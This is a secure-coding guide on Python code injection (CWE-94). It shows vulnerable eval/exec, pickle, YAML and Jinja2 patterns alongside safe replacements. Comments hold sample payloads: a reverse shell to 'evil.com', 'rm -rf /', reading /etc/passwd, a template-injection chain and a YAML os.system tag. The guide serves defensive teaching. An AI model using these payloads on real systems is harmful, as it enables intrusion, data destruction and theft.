CWE-94: Improper Control of Generation of Code (Code Injection) - Python
Overview
Code injection in Python occurs when untrusted input is passed to code execution functions like eval(), exec(), compile(), or __import__(). This allows attackers to execute arbitrary Python code with full access to the application's runtime environment, including file system, network, environment variables, imported modules, and all application data. Python's dynamic nature and powerful introspection capabilities make code injection particularly dangerous.
Primary Defence: Never use eval() or exec() with user input. Use safe alternatives such as ast.literal_eval() for evaluating literals and json.loads() for JSON data, and implement strict allowlists for any dynamic code evaluation. If code evaluation is absolutely necessary, use sandboxed execution with restricted __builtins__ (as defense-in-depth, not a complete sandbox), and validate all input against strict patterns to prevent arbitrary code execution.
Common Vulnerable Patterns
eval() with User Input
# VULNERABLE - Direct eval of user input
def calculate(expression):
    result = eval(expression)  # NEVER DO THIS
    return result
# User input: "__import__('os').system('rm -rf /')"
# Executes arbitrary code!
Why this is vulnerable: eval() executes any Python expression. Attacker can import modules, call functions, access globals.
exec() with User Code
# VULNERABLE - Execute user-provided code
def run_user_script(code):
    exec(code)  # EXTREMELY DANGEROUS
    return "Script executed"
# User input: "import socket; s=socket.socket(); s.connect(('evil.com',1234)); ..."
# Reverse shell established!
Why this is vulnerable: exec() can execute multiple statements, imports, class definitions - full Python capabilities.
compile() and exec() Chain
# VULNERABLE - Compile and execute user code
def execute_formula(formula):
    compiled = compile(formula, '<string>', 'eval')
    result = eval(compiled)
    return result
# User input: "open('/etc/passwd').read()"
# Reads sensitive file
Why this is vulnerable: compile() + eval() provides same attack surface as direct eval().
Dynamic Module Import
import importlib
# VULNERABLE - Import user-specified module
def load_plugin(plugin_name):
    module = __import__(plugin_name)  # DANGEROUS
    return module
# Alternate dangerous approach
def load_module(module_name):
    module = importlib.import_module(module_name)  # DANGEROUS
    return module
# User input: "subprocess" or "os"
# Attacker can import any module and access dangerous functions
Why this is vulnerable: Allows importing arbitrary modules. Attacker can import os, subprocess, socket, etc.
Template Injection (Jinja2 Unsafe)
from jinja2 import Template
# VULNERABLE - User input in template without sandboxing
def render_greeting(name):
    template_str = f"Hello {{{{ {name} }}}}"
    template = Template(template_str)
    return template.render()
# User input: "''.__class__.__mro__[1].__subclasses__()[104].__init__.__globals__['sys'].modules['os'].system('whoami')"
# Executes system command via template injection!
Why this is vulnerable: Jinja2 templates can access Python objects. Attacker can traverse object hierarchy to reach dangerous functions.
Pickle Deserialization
import pickle
# VULNERABLE - Unpickle untrusted data
def load_user_data(data):
    obj = pickle.loads(data)  # CRITICAL VULNERABILITY
    return obj
# Attacker sends crafted pickle payload
# Arbitrary code executes during unpickling
Why this is vulnerable: Pickle can execute arbitrary code during deserialization via __reduce__ method.
YAML Unsafe Loading
import yaml
# VULNERABLE - Load YAML with arbitrary Python object execution
def load_config(yaml_str):
    config = yaml.load(yaml_str)  # DEPRECATED - DANGEROUS
    # or yaml.load(yaml_str, Loader=yaml.Loader)  # ALSO DANGEROUS
    return config
# User YAML input:
# !!python/object/apply:os.system ['whoami']
# Executes system command!
Why this is vulnerable: yaml.load() without Loader=yaml.SafeLoader can instantiate arbitrary Python objects.
Format String with User Globals Access
# VULNERABLE - Format string controlled by the user
def format_message(template, **kwargs):
    return template.format(**kwargs)
# User input template: "{user.__init__.__globals__}"
# Attribute and index access in the format string can reach module globals
# and leak secrets (configuration values, API keys, etc.)
Why this is vulnerable: str.format() lets the format string access attributes and items of the objects passed to it. format() cannot call functions directly, but combined with __globals__ traversal an attacker can reach module internals and exfiltrate sensitive data.
Secure Patterns
SECURE: ast.literal_eval() for Safe Evaluation
import ast
# SECURE - Only allows Python literals (strings, numbers, tuples, lists, dicts, booleans, None)
def safe_calculate(expression):
    try:
        # Only evaluates literals - no function calls, no imports
        result = ast.literal_eval(expression)
        return result
    except (ValueError, SyntaxError):
        raise ValueError("Invalid expression")
# Safe inputs: "42", "3.14", "{'key': 'value'}", "[1, 2, 3]"
# Blocked: "__import__('os').system('whoami')" - raises ValueError
Why this works: ast.literal_eval() only parses Python literal structures (strings, numbers, tuples, lists, dicts, sets, booleans, None) - it cannot evaluate function calls, variable lookups, imports, or any executable code. The function parses the input into an AST (Abstract Syntax Tree) and verifies every node is a literal; if it finds anything else (function call, attribute access, operator), it raises ValueError. This makes it safe for deserializing simple data structures from untrusted input, such as config files or user-supplied parameters. Unlike eval(), which executes arbitrary Python code and can run __import__('os').system('rm -rf /'), ast.literal_eval() is strictly data-only. Use it for parsing lists, dicts, numbers, and strings when you control the format but not the content. For more complex deserialization, use json.loads() (even safer, only basic types).
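A minimal comparison sketch (not from the original scanner output) showing both safe parsers handling the same kind of data-only payload:
import ast
import json
untrusted_dict = "{'key': 'value'}"            # Python literal syntax
untrusted_json = '{"key": "value"}'            # JSON syntax
as_literal = ast.literal_eval(untrusted_dict)  # {'key': 'value'}
as_json = json.loads(untrusted_json)           # {'key': 'value'}
# Both reject executable payloads:
# ast.literal_eval("__import__('os')") raises ValueError
# json.loads("__import__('os')") raises json.JSONDecodeError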
SECURE: Restricted Expression Parser
import ast
import operator
# SECURE - Allowlist of permitted operators
ALLOWED_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
    ast.Mod: operator.mod,
    ast.Pow: operator.pow,
    ast.USub: operator.neg,
}
# ast.operator/ast.unaryop are the base classes of the operator nodes that appear
# as children of BinOp/UnaryOp during ast.walk(); the specific operator is then
# checked against ALLOWED_OPS below
ALLOWED_NODES = (ast.Expression, ast.Constant, ast.BinOp, ast.UnaryOp,
                 ast.operator, ast.unaryop)
def safe_eval(expr):
    """Safely evaluate mathematical expressions only"""
    tree = ast.parse(expr, mode='eval')
    # Verify only allowed node types and operators
    for node in ast.walk(tree):
        if not isinstance(node, ALLOWED_NODES):
            raise ValueError(f"Forbidden node type: {type(node).__name__}")
        if isinstance(node, (ast.BinOp, ast.UnaryOp)) and type(node.op) not in ALLOWED_OPS:
            raise ValueError(f"Forbidden operator: {type(node.op).__name__}")
    # Evaluate the validated tree with a small recursive interpreter
    def eval_node(node):
        if isinstance(node, ast.Constant):
            return node.value
        elif isinstance(node, ast.BinOp):
            left = eval_node(node.left)
            right = eval_node(node.right)
            return ALLOWED_OPS[type(node.op)](left, right)
        elif isinstance(node, ast.UnaryOp):
            operand = eval_node(node.operand)
            return ALLOWED_OPS[type(node.op)](operand)
        else:
            raise ValueError(f"Unsupported node: {type(node).__name__}")
    return eval_node(tree.body)
# Usage
result = safe_eval("(10 + 5) * 2")  # 30
# safe_eval("__import__('os').system('whoami')")  # Raises ValueError
Why this works: This AST-based expression evaluator parses user input into an Abstract Syntax Tree and validates it against an allowlist of safe node types and operators before execution. The ast.parse() call converts the expression into a structured tree without executing it. By walking the AST and checking each node is in ALLOWED_NODES (only literals, binary ops, unary ops) and each operator is in ALLOWED_OPS (only basic arithmetic), you prevent function calls, imports, attribute access, and other dangerous operations. The custom eval_node() interpreter then safely evaluates only the allowed operations. This approach is far more secure than eval() because attackers cannot call __import__(), access __builtins__, or escape the sandbox. Use this pattern for calculators, formula evaluators, or any feature where users provide mathematical expressions. The allowlist is explicit and auditable; add only operations you've reviewed.
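For example, extending the allowlist with an additional reviewed operator is a one-line, auditable change - a sketch against the safe_eval evaluator above (the FloorDiv addition is illustrative):
import ast
import operator
# Add floor division only after reviewing that it is safe for your use case
ALLOWED_OPS[ast.FloorDiv] = operator.floordiv
result = safe_eval("7 // 2")  # 3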
SECURE: Configuration-Driven Logic (Not Code)
import json
# SECURE - Use JSON configuration instead of code
def apply_pricing_rule(price, rule_config):
    """Apply pricing rules from JSON config, not executable code"""
    rule = json.loads(rule_config)
    # Declarative configuration
    if rule['type'] == 'percentage_discount':
        discount = price * (rule['percent'] / 100)
        return price - discount
    elif rule['type'] == 'fixed_discount':
        return price - rule['amount']
    elif rule['type'] == 'bulk_discount':
        if price > rule['threshold']:
            return price * (1 - rule['discount'])
        return price
    else:
        raise ValueError("Unknown rule type")
# Safe configuration (JSON, not code)
config = '{"type": "percentage_discount", "percent": 10}'
discounted = apply_pricing_rule(100, config)  # 90.0
# No code injection possible - only data configuration
Why this works: Using JSON for configuration instead of executable code eliminates code injection entirely. JSON is a data-only format - it can only represent basic types (objects, arrays, strings, numbers, booleans, null); it cannot contain functions, class instantiations, imports, or executable statements. When you parse JSON with json.loads(), you get pure Python data structures (dicts, lists, strings, numbers), not code. The business logic (if/elif conditions, calculations) lives in your trusted Python code, while user input only supplies data values (discount percentages, thresholds, amounts). This is the safest pattern for extensibility: users configure behavior through data, not by injecting code. Even if an attacker fully controls rule_config, they can only set field values, not execute commands or access the system. Use JSON config for pricing rules, workflows, plugins, feature flags - anywhere users customize behavior. Combine with schema validation (jsonschema) to enforce data structure and prevent logic errors.
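As a sketch of the schema-validation step mentioned above, using the third-party jsonschema package (the schema fields shown are illustrative, matching the pricing rules in the example):
import json
import jsonschema  # third-party: pip install jsonschema
PRICING_RULE_SCHEMA = {
    "type": "object",
    "properties": {
        "type": {"enum": ["percentage_discount", "fixed_discount", "bulk_discount"]},
        "percent": {"type": "number", "minimum": 0, "maximum": 100},
        "amount": {"type": "number", "minimum": 0},
        "threshold": {"type": "number", "minimum": 0},
        "discount": {"type": "number", "minimum": 0, "maximum": 1},
    },
    "required": ["type"],
    "additionalProperties": False,
}
def load_pricing_rule(rule_config):
    rule = json.loads(rule_config)
    # Reject configs that do not match the expected structure
    jsonschema.validate(instance=rule, schema=PRICING_RULE_SCHEMA)
    return rule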
SECURE: Jinja2 with Sandboxing
from jinja2.sandbox import SandboxedEnvironment
# SECURE - Use Jinja2 sandbox
env = SandboxedEnvironment()
def render_template(template_str, context):
    """Render templates in sandboxed environment"""
    template = env.from_string(template_str)
    return template.render(context)
# Usage
result = render_template("Hello {{ name }}!", {'name': 'Alice'})  # "Hello Alice!"
# Sandboxed - dangerous operations blocked
# template_str = "{{ ''.__class__.__mro__[1].__subclasses__() }}"
# Raises SecurityError
Why this works: Jinja2's SandboxedEnvironment restricts template access to dangerous Python features, preventing code injection through template strings. Unlike regular Jinja2 (which allows attribute access like {{''.__class__.__mro__}}), the sandbox blocks access to private attributes (those starting with _), sensitive methods (__subclasses__, __globals__), and dangerous builtins. Attackers often exploit template engines to escape into the Python runtime via attribute traversal; the sandbox prevents this by intercepting attribute lookups and rejecting unsafe ones. The sandbox also disables dangerous template tags and filters unless explicitly allowed. Use SandboxedEnvironment for any user-editable templates (email templates, report generators, CMS content). Never use regular Environment with untrusted templates. Combine with auto-escaping (enable it with autoescape=True or select_autoescape(); it is off by default) to prevent XSS, and register only safe custom filters/functions, as sketched below. For even stricter control, consider a logic-less engine (Mustache, Handlebars) with no code execution.
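For instance, registering a reviewed, data-only filter and handling SecurityError might look like this (a sketch; the 'shout' filter name is illustrative):
from jinja2.sandbox import SandboxedEnvironment
from jinja2.exceptions import SecurityError
env = SandboxedEnvironment(autoescape=True)
env.filters['shout'] = lambda s: str(s).upper()  # reviewed, data-only filter
def render_user_template(template_str, context):
    try:
        return env.from_string(template_str).render(context)
    except SecurityError:
        # Attribute traversal and other sandbox violations end up here
        raise ValueError("Template rejected by sandbox")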
SECURE: Safe YAML Loading
import yaml
# SECURE - Use SafeLoader to prevent arbitrary object instantiation
def load_config(yaml_str):
    config = yaml.safe_load(yaml_str)  # ALWAYS use safe_load
    return config
# Alternative explicit safe loader
def load_config_explicit(yaml_str):
    config = yaml.load(yaml_str, Loader=yaml.SafeLoader)
    return config
# Safe - only loads basic YAML types (strings, numbers, lists, dicts)
# Blocks: !!python/object/apply:os.system ['whoami']
Why this works: yaml.safe_load() only constructs simple Python objects (dict, list, str, int, float, bool, None) and blocks arbitrary object instantiation, preventing code execution via YAML deserialization. The unsafe yaml.load() (deprecated) can instantiate any Python class using YAML tags like !!python/object/apply:, allowing attackers to run os.system(), open files, or execute arbitrary code. safe_load() uses SafeLoader, which only recognizes basic YAML types and ignores dangerous tags. Always use safe_load() or explicitly pass Loader=yaml.SafeLoader when parsing untrusted YAML. This vulnerability (YAML deserialization) has caused major breaches; unsafe YAML loading is as dangerous as eval(). For configuration files you control, safe_load() is sufficient. If you need custom object loading, define explicit constructors with add_constructor() and validate fields, never use yaml.load() or UnsafeLoader.
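If you do need a custom tag, register an explicit constructor on SafeLoader rather than falling back to yaml.load() - a sketch assuming a hypothetical !point tag in your own config format:
import yaml
def point_constructor(loader, node):
    data = loader.construct_mapping(node)
    # Validate and coerce fields explicitly - no arbitrary object instantiation
    return {'x': float(data['x']), 'y': float(data['y'])}
yaml.add_constructor('!point', point_constructor, Loader=yaml.SafeLoader)
config = yaml.safe_load("origin: !point {x: 1, y: 2}")  # {'origin': {'x': 1.0, 'y': 2.0}}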
SECURE: JSON for Serialization (Not Pickle)
import json
# SECURE - Use JSON instead of pickle
def save_user_data(data):
    serialized = json.dumps(data)
    return serialized
def load_user_data(serialized):
    data = json.loads(serialized)
    return data
# JSON only supports basic types - no code execution
# If complex objects needed, use explicit serialization methods
Why this works: JSON is a data-only format that cannot execute code during deserialization, while pickle can instantiate arbitrary Python objects and execute code via __reduce__ methods, making it dangerous for untrusted data. When you json.loads() a payload, you get only basic types (dicts, lists, strings, numbers); an attacker cannot trigger class constructors, import modules, or run commands. Pickle, by contrast, is designed to serialize entire Python object graphs, including class instances, and can call arbitrary code during unpickling. Attackers craft malicious pickle payloads that execute os.system(), open reverse shells, or exfiltrate data. Never unpickle untrusted data - use JSON for serialization. If you need complex objects, serialize them to JSON with explicit to_dict() methods and reconstruct them with constructors that validate fields. For internal, trusted use (caching, IPC between your own processes), pickle is acceptable with integrity checks (HMAC).
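A minimal sketch of the explicit-serialization approach for complex objects (the UserProfile type here is hypothetical):
import json
from dataclasses import dataclass
@dataclass
class UserProfile:
    username: str
    theme: str
    def to_dict(self):
        return {'username': self.username, 'theme': self.theme}
    @classmethod
    def from_dict(cls, data):
        # Validate fields explicitly - nothing executes during parsing
        if not isinstance(data.get('username'), str):
            raise ValueError("username must be a string")
        return cls(username=data['username'], theme=str(data.get('theme', 'light')))
profile = UserProfile.from_dict(json.loads('{"username": "alice", "theme": "dark"}'))
serialized = json.dumps(profile.to_dict())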
SECURE: Plugin System with Allowlist
import importlib
# SECURE - Allowlist of permitted plugins
ALLOWED_PLUGINS = {
    'plugin_auth': 'myapp.plugins.auth',
    'plugin_reports': 'myapp.plugins.reports',
    'plugin_export': 'myapp.plugins.export'
}
def load_plugin(plugin_name):
    """Load plugin from allowlist only"""
    if plugin_name not in ALLOWED_PLUGINS:
        raise ValueError(f"Plugin '{plugin_name}' not allowed")
    module_path = ALLOWED_PLUGINS[plugin_name]
    module = importlib.import_module(module_path)
    return module
# Safe - only pre-approved plugins can be loaded
# load_plugin('os')  # Raises ValueError
Why this works: Allowlisting modules for dynamic imports prevents code injection by ensuring only pre-approved, safe modules can be loaded. When users control which modules to import (plugin systems, configurable imports), an attacker could import dangerous modules (os, subprocess, importlib) or malicious third-party packages to execute arbitrary code, read files, or compromise the system. By checking plugin_name against ALLOWED_PLUGINS before calling importlib.import_module(), you ensure only trusted, reviewed plugins are accessible. The allowlist maps user-facing plugin names to specific module paths you control, preventing path traversal or namespace pollution. This pattern is critical for plugin architectures. Store the allowlist server-side (never trust client input for module names), keep it minimal and audited, and review each plugin's code. For stronger isolation, load plugins in separate processes (multiprocessing) or containers. Combine with code signing or hash verification to detect tampering.
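Beyond the allowlist, it also helps to verify that the loaded module exposes the expected interface before using it (a sketch; the register() entry-point name is hypothetical):
def get_plugin_entry_point(plugin_name):
    module = load_plugin(plugin_name)          # allowlist check from above
    entry = getattr(module, 'register', None)  # hypothetical entry-point name
    if not callable(entry):
        raise ValueError(f"Plugin '{plugin_name}' has no register() entry point")
    return entry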
SECURE: Mathematical Expression Evaluator (sympy)
from sympy.parsing.sympy_parser import parse_expr, standard_transformations, implicit_multiplication_application
# SECURE - Use sympy's parser for mathematical expressions
def safe_math_eval(expr_str):
    """Safely evaluate mathematical expressions"""
    try:
        transformations = (standard_transformations + (implicit_multiplication_application,))
        expr = parse_expr(expr_str, transformations=transformations)
        result = expr.evalf()
        return float(result)
    except Exception as e:
        raise ValueError(f"Invalid mathematical expression: {e}")
# Safe mathematical evaluation
result = safe_math_eval("2*pi + sqrt(16)")  # Works
# safe_math_eval("__import__('os')")  # Raises ValueError
Why this works: sympy provides a mathematical expression parser intended to evaluate math operations (arithmetic, algebra, calculus, constants like pi), not arbitrary Python code. parse_expr() converts the expression into a symbolic form and evaluates it numerically, and attempts to call names outside sympy's math namespace typically fail and surface as ValueError here. Be aware, however, that SymPy's documentation warns that sympify()/parse_expr() use eval() internally and should not be fed unsanitized input; treat this as a convenience for semi-trusted input rather than a hard security boundary, and combine it with strict validation (length limits and character allowlists, as shown in Step 3 of the remediation below) or prefer the AST-based evaluator above for fully untrusted input. Use sympy when you need symbolic math capabilities (variables, sin, cos, sqrt, integrals); for simple arithmetic, the AST-based evaluator shown earlier is lighter and safer. Always wrap evaluation in try/except and set evaluation limits (timeout, recursion depth) to prevent DoS, as sketched below.
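One way to bound evaluation time, as suggested above, is to run the parser in a worker process with a hard timeout - a sketch reusing safe_math_eval from the block above:
import multiprocessing
def eval_with_timeout(expr_str, seconds=2):
    """Evaluate in a separate process so runaway expressions can be cut off."""
    with multiprocessing.Pool(processes=1) as pool:
        async_result = pool.apply_async(safe_math_eval, (expr_str,))
        # Raises multiprocessing.TimeoutError if evaluation takes too long;
        # the worker process is terminated when the pool context exits
        return async_result.get(timeout=seconds)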
Key Security Functions
AST-based Expression Validator
import ast
def validate_safe_expression(expr_str):
    """Validate expression only contains safe operations"""
    try:
        tree = ast.parse(expr_str, mode='eval')
    except SyntaxError:
        raise ValueError("Invalid Python syntax")
    # Define allowed node types (ast.Constant covers numbers and strings on Python 3.8+)
    SAFE_NODES = (
        ast.Expression, ast.Constant,
        ast.BinOp, ast.UnaryOp, ast.Compare,
        ast.List, ast.Tuple, ast.Dict,
        ast.Load,  # expression context attached to List/Tuple nodes
        ast.Add, ast.Sub, ast.Mult, ast.Div, ast.Mod, ast.Pow,
        ast.Eq, ast.NotEq, ast.Lt, ast.LtE, ast.Gt, ast.GtE,
        ast.USub, ast.UAdd
    )
    for node in ast.walk(tree):
        if not isinstance(node, SAFE_NODES):
            raise ValueError(f"Forbidden operation: {type(node).__name__}")
    return True
# Usage
validate_safe_expression("(10 + 5) * 2")  # OK
# validate_safe_expression("__import__('os')")  # Raises ValueError
Sandboxed Execution Environment
def sandboxed_eval(expr, allowed_builtins=None):
    """Execute an expression with a restricted set of builtins.

    Caution: restricting __builtins__ is defense-in-depth, not a true sandbox.
    Determined attackers may still escape via attribute traversal (for example
    through object.__subclasses__()), so prefer the AST-based approaches above
    for untrusted input.
    """
    if allowed_builtins is None:
        allowed_builtins = {
            'abs': abs, 'min': min, 'max': max, 'len': len,
            'sum': sum, 'round': round, 'sorted': sorted
        }
    # Restricted global namespace and empty local namespace
    safe_globals = {
        '__builtins__': allowed_builtins
    }
    safe_locals = {}
    try:
        result = eval(expr, safe_globals, safe_locals)
        return result
    except Exception as e:
        raise ValueError(f"Evaluation error: {e}")
# Usage
result = sandboxed_eval("abs(-5) + max([1,2,3])")  # 8
# sandboxed_eval("open('/etc/passwd').read()")  # Raises ValueError ("name 'open' is not defined")
Plugin Signature Verification
import hashlib
import hmac
import os
# Example only: load the signing key from the environment, never hardcode it
PLUGIN_SECRET = os.environ['PLUGIN_SIGNING_KEY'].encode()
def verify_plugin_signature(plugin_code, signature):
    """Verify plugin hasn't been tampered with"""
    expected_sig = hmac.new(PLUGIN_SECRET, plugin_code.encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected_sig, signature)
def load_verified_plugin(plugin_code, signature):
    """Only load plugins with valid signature"""
    if not verify_plugin_signature(plugin_code, signature):
        raise ValueError("Invalid plugin signature")
    # Even with verification, execute in restricted environment
    safe_globals = {'__builtins__': {}}
    exec(plugin_code, safe_globals)
    return safe_globals
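A usage sketch, reusing PLUGIN_SECRET and the functions above (the plugin source and signing step are illustrative):
plugin_source = "def greet(name):\n    return 'Hello ' + name\n"
# The publisher computes the signature with the shared secret...
signature = hmac.new(PLUGIN_SECRET, plugin_source.encode(), hashlib.sha256).hexdigest()
# ...and the loader verifies it before executing the code
namespace = load_verified_plugin(plugin_source, signature)
print(namespace['greet']('Alice'))  # Hello Alice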
Verification
After implementing the recommended secure patterns, verify the fix through multiple approaches:
- Manual testing: Submit malicious payloads relevant to this vulnerability and confirm they're handled safely without executing unintended operations
- Code review: Confirm all instances use the secure pattern (safe parsers such as ast.literal_eval(), allowlists, sandboxed environments) with no eval(), exec(), or dynamic imports driven by user input
- Static analysis: Use security scanners to verify no new vulnerabilities exist and the original finding is resolved
- Regression testing: Ensure legitimate user inputs and application workflows continue to function correctly
- Edge case validation: Test with special characters, boundary conditions, and unusual inputs to verify proper handling
- Framework verification: If using a framework or library, confirm the recommended APIs are used correctly according to documentation
- Authentication/session testing: Verify security controls remain effective and cannot be bypassed (if applicable to the vulnerability type)
- Rescan: Run the security scanner again to confirm the finding is resolved and no new issues were introduced
Analysis Steps
- Locate the eval/exec call
- Trace Input Source:
  - Web form? request.form['expression']
  - API endpoint? request.json['code']
  - File upload? Reading file contents
  - Database? User-stored formulas
- Assess Execution Context:
  - What can injected code access? (All Python modules, file system, network)
  - What privileges does the application run with? (Web server user, database access)
  - What data is accessible? (User data, secrets in environment variables)
- Determine Safe Alternative:
  - Mathematical expressions → Use ast.literal_eval() or sympy
  - Configuration → Use JSON/YAML with safe_load()
  - Business rules → Use rule engine or declarative config
  - Plugin system → Use allowlist + signature verification
Remediation for Scanner Finding
Step 1: Identify the purpose
# BEFORE (Line 42 - vulnerable)
def calculate(user_expression):
    result = eval(user_expression)  # User wants to calculate "2 + 2"
    return result
Step 2: Replace with safe alternative
# AFTER (fixed with ast.literal_eval for simple cases)
import ast
def calculate(user_expression):
    try:
        # literal_eval only accepts literal values (numbers, strings, lists, dicts);
        # an arithmetic expression like "2 + 2" is rejected - use the math evaluator below
        result = ast.literal_eval(user_expression)
        return result
    except (ValueError, SyntaxError):
        raise ValueError("Invalid expression")
# Or for more complex math:
from sympy import sympify
def calculate_math(user_expression):
    try:
        expr = sympify(user_expression)
        result = expr.evalf()
        return float(result)
    except Exception:
        raise ValueError("Invalid mathematical expression")
Step 3: Add input validation
import re
def validate_math_expression(expr):
    """Additional validation layer"""
    # Max length
    if len(expr) > 200:
        raise ValueError("Expression too long")
    # Only allow safe characters
    if not re.match(r'^[0-9+\-*/().\s]+$', expr):
        raise ValueError("Invalid characters in expression")
    # Deny dangerous keywords
    forbidden = ['import', 'exec', 'eval', 'compile', 'open', '__']
    for word in forbidden:
        if word in expr.lower():
            raise ValueError("Forbidden keyword in expression")
    return True
def safe_calculate(user_expression):
    validate_math_expression(user_expression)
    # Evaluate with a safe parser - e.g. the AST-based safe_eval defined earlier
    # or sympy's parse_expr - never with eval()
    result = safe_eval(user_expression)
    return result
Common Scanner False Positives
False Positive: eval() with Hardcoded String
# May be flagged but is safe if input is truly hardcoded
config = eval("{'setting': True}")  # Hardcoded, not from user
# Better: Use ast.literal_eval anyway for defense-in-depth
import ast
config = ast.literal_eval("{'setting': True}")
Verification
After remediation:
- No eval(), exec(), or compile() with user input
- No __import__() or importlib.import_module() with user strings
- Templates use SandboxedEnvironment (Jinja2)
- YAML uses yaml.safe_load() (not yaml.load())
- Deserialization uses JSON (not pickle)
- Scanner re-scan shows finding resolved
- Tested with code injection payloads (blocked)
Security Checklist
- Never use eval(), exec(), or compile() with user input
- Never use __import__() or importlib.import_module() with user strings
- Use ast.literal_eval() for literal evaluation only
- Use JSON/YAML with safe_load() for configuration
- Use SandboxedEnvironment for Jinja2 templates
- Never deserialize untrusted data with pickle
- Implement plugin allowlisting for dynamic imports
- Validate input length and character set
- Use AST parsing to verify safe expressions
- Consider using sympy or numexpr for mathematical expressions
- Log and monitor code execution attempts
- Run automated security scans (Bandit, Semgrep)